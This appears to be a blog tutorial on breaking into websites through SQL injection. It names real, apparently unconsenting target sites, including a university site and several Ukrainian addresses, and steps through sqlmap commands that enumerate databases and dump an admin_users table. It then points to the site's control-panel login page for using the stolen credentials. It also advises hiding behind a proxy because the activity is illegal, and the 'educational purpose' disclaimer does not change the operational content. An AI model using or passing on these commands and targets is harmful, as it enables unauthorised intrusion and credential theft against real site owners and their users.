How To Hack A Website In 10Mins

How to Hack a website: 

This post is to learn SOL-injection in Backtrack to hack websites. Just for educational purpose 

.

Step 1:

• First you need to Scan SQL vulnerable site that contains error in SQL.

• For Scanning Download : sql_poizon_v1.1_-_sqli_exploit_scanner_tool.rar

.

Step 2:

• After Downloaded sql_poizon start scanning for vulnerable site.

• You can either select one particular website.

• Country can also be selected through which you wanna find vulnerable sites.

• Just follow these pics.

.

Step 3:

• We have located various vulnerable site link that contains error.

• I am using this vulnerable Link.

• http://www.hitecuni.edu.pk/default/index.php?option=com_content&view/news/NewsDetails.php?ID=20′
   

• My SQL Error server version ’20′ at line 1 shows its vulnerability.

• Errors and Bugs are always fixed in every updates. So you have to find fresh link with SQL error by yourself.

• • In case you haven’t found any vulnerable links then here it is to practice.
  • http://www.route66.com.ua/index.php?id=59′
  • http://teddyland.org.ua/eng/index.php?id=40%27
  • http://vecherka.donetsk.ua/index.php?id=4647′&show=news’

.

Step 4:

• Start Backtrack to inject SQL script.

• If you aren’t familiar with Backtrack it’s not a persoalan at all. Just check out this link to download and install how to install backtrack on windows

.

• Backtrack >> Exploitation tool >> Web Exploitation Tools >> Sql Map

.

.

Step 5

• Syntax we will be using,  For Scanning URL

• ./sqlmap.py -u [URL]  e.g  

./sqlmap.py -u http://www.hitecuni.edu.pk/default/index.php?option=com_content&view/news/NewsDetails.php?ID=20′

.

• This Gives us Basic information about Database version e.g My Sql > 5.0.11

.

step 6:

• Now Lets Extract Database, For this we use Syntax

• ./sqlmap.py -u [URL] –dbs  e.g

./sqlmap.py -u http://www.hitecuni.edu.pk/default/index.php?option=com_content&view/news/NewsDetails.php?ID=20′ –dbs

.

•  There are 2 Database we found.  1. information_schema and 2. Khybere_Khydb

• We will be using any one of the Table, So in this we are using Khybere_Khydb

.

Step 7:

• Now we use this Syntax For getting Tables.

• As Database = Khybere_Khydb

• ./sqlmap.py -u [URL] –tables -D [database] 

./sqlmap.py -u http://www.hitecuni.edu.pk/default/index.php?option=com_content&view/news/NewsDetails.php?ID=20′ – tables -DKhybere_Khydb

.

• So here it is, We found 13 Tables

• Out of these 13 i am using admin_users to get admin username and password.

• You can use any of it according to the information.

.

Step 8:

• In this syntax we use it for getting columns

• Table name = admin_users ;  Database = Khybere_Khydb

• ./sqlmap.py -u [URL] –columns -T [Table name] -D [database]

./sqlmap.py -u http://www.hitecuni.edu.pk/default/index.php?option=com_content&view/news/NewsDetails.php?ID=20′ –columns-T admin_users -D Khybere_Khydb

.

• 3 columns are found

• Now lets Dump the DATA.

.

Step 9:

• We can either Dump the whole Column or specific column

• For dumping whole column we use syntax

• ./sqlmap.py -u [URL] –dump –columns -T [table name] -D [database name] e.g

./sqlmap.py -u http://www.hitecuni.edu.pk/default/index.php?option=com_content&view/news/NewsDetails.php?ID=20′ –dump–columns -T admin_users -D Khybere_Khydb

.

• For specific column dump./sqlmap.py -u [URL] –dump -C [column name] -T [table name] -D [database name]

.

Step 10:

• Congrats you have successfully Hacked and learned How to Hack a website and got it’s Username & Password.

• Next you Have to find Admin Login Page.

• http://hitecuni.edu.pk:2082/

• Enter Username & Password

.

.

Useful Tips on How to Hack a website:

• Download different Software’s that Can Scan URL’s vulnerability.

• If My-SQL error is not Found then that site can’t be hacked by this method.

• Always Use Proxy server to Hack, obviously it is an illegal activity.

• like us on facebook.

• One Last thing, Grades Don’t defines Intelligence, Anyone can learn it